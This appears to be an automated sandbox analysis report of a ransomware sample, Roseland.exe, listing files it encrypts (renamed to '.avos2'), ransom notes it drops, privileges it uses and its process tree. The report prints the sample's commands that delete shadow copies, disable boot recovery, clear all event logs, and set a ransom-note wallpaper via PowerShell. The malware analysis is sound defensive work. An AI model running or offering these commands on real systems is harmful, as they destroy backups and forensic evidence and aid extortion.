MD5 6d81ed40ba0a283e5483bfe6a448e9d7
SHA1 0c847a5f9df743b13e1aa11b4c24a4309e9a7119
SHA256 b4464f61655ca584170694bedd52c6cff2b74c18a761b33cfb1387f017d2d57d
SHA512 8956415f155f24852ac672aa06cc6a8819a2a0e44a9b940f8f3390c34ebb43ff10f4635722f104a5a9a94098d3f286362f507dc49d3f048e540f48c073eaf379

memory/2844-78-0x000000000245B000-0x000000000247A000-memory.dmp

memory/2920-79-0x0000000000000000-mapping.dmp

memory/2932-80-0x0000000000000000-mapping.dmp

memory/2844-81-0x0000000002454000-0x0000000002457000-memory.dmp

memory/2844-82-0x000000000245B000-0x000000000247A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-01-30 14:44

Reported

2023-01-30 14:47

Platform

win10v2004-20221111-en

Max time kernel

91s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Roseland.exe"

Signatures

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\CheckpointEnable.tif => C:\Users\Admin\Pictures\CheckpointEnable.tif.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\SplitSearch.raw => C:\Users\Admin\Pictures\SplitSearch.raw.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\ExitSuspend.png => C:\Users\Admin\Pictures\ExitSuspend.png.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\850290291.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\EmptySearch-Dark.scale-150.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019MSDNR_Retail-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_zh_CN.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019MSDNR_Retail-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\keypad\keypadbase.xml C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\eu-es\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagementSource\ja-JP\MSFT_PackageManagementSource.strings.psd1 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\ENES\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial2-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL077.XML C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\en-gb\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\chrome-ext-2x.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\bg_pattern_RHP.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\selection-actions.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarLargeTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vreg\powerpoint.x-none.msi.16.x-none.vreg.dat C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Common Files\System\Ole DB\en-US\msdasqlr.dll.mui C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\msedge_100_percent.pak.DATA C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\kn.pak C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\ExchangeLargeTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\OutlookMailSmallTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_OEM_Perp-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\StandardVL_KMS_Client-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\EdgeWebView.dat.DATA C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\en-US\msdaprsr.dll.mui C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailLargeTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-attach.xml C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\checkmark.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\s_thumbnailview_18.svg C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\ExchangeMediumTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019XC2RVL_MAKC2R-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_ja.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.service.exsd C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ga\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\pt-br\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nb-no\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailAppList.targetsize-40.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarSplashLogo.scale-300.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\common.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\nl-nl\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\COMPASS\COMPASS.INF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription1-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.ja_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Examples\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\FirstRunMailBlurred.layoutdir-LTR.jpg C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Outlook.scale-250.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdO365R_SubTest-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\management\jmxremote.access C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\etc\visualvm.conf C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fr-ma\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\review_poster.jpg C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\da-dk\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailSmallTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\STRTEDGE\PREVIEW.GIF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Arial Black-Arial.xml C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\it-it\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL112.XML C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\PlayReadyCdm\_platform_specific\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4072 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4072 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4072 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4072 wrote to memory of 1704 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4072 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4072 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4072 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4072 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4072 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 4072 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\SYSTEM32\cmd.exe
PID 2324 wrote to memory of 1256 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2324 wrote to memory of 1256 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4932 wrote to memory of 1580 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4932 wrote to memory of 1580 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4312 wrote to memory of 1204 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 4312 wrote to memory of 1204 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1704 wrote to memory of 2264 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1704 wrote to memory of 2264 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3500 wrote to memory of 1988 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3500 wrote to memory of 1988 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4072 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4072 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4968 wrote to memory of 2376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4968 wrote to memory of 2376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 4968 wrote to memory of 2664 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 4968 wrote to memory of 2664 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Roseland.exe

"C:\Users\Admin\AppData\Local\Temp\Roseland.exe"

C:\Windows\SYSTEM32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\SYSTEM32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SYSTEM32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\850290291.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

Country Destination Domain Proto
N/A 104.80.225.205:443 tcp
N/A 40.79.189.58:443 tcp
N/A 93.184.221.240:80 tcp
N/A 93.184.221.240:80 tcp
N/A 93.184.221.240:80 tcp

Files

memory/4932-132-0x0000000000000000-mapping.dmp

memory/4312-134-0x0000000000000000-mapping.dmp

memory/1704-133-0x0000000000000000-mapping.dmp

memory/3500-136-0x0000000000000000-mapping.dmp

memory/2324-135-0x0000000000000000-mapping.dmp

memory/1256-137-0x0000000000000000-mapping.dmp

memory/1204-139-0x0000000000000000-mapping.dmp

memory/2264-140-0x0000000000000000-mapping.dmp

memory/1580-138-0x0000000000000000-mapping.dmp

memory/1988-141-0x0000000000000000-mapping.dmp

memory/1988-142-0x00000257D23F0000-0x00000257D2412000-memory.dmp

memory/1988-143-0x00007FF9C1930000-0x00007FF9C23F1000-memory.dmp

memory/1988-144-0x00007FF9C1930000-0x00007FF9C23F1000-memory.dmp

memory/4968-145-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5caad758326454b5788ec35315c4c304
SHA1 3aef8dba8042662a7fcf97e51047dc636b4d4724
SHA256 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA512 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

C:\GET_YOUR_FILES_BACK.txt

MD5 6d81ed40ba0a283e5483bfe6a448e9d7
SHA1 0c847a5f9df743b13e1aa11b4c24a4309e9a7119
SHA256 b4464f61655ca584170694bedd52c6cff2b74c18a761b33cfb1387f017d2d57d
SHA512 8956415f155f24852ac672aa06cc6a8819a2a0e44a9b940f8f3390c34ebb43ff10f4635722f104a5a9a94098d3f286362f507dc49d3f048e540f48c073eaf379

memory/4968-150-0x00007FF9C1460000-0x00007FF9C1F21000-memory.dmp

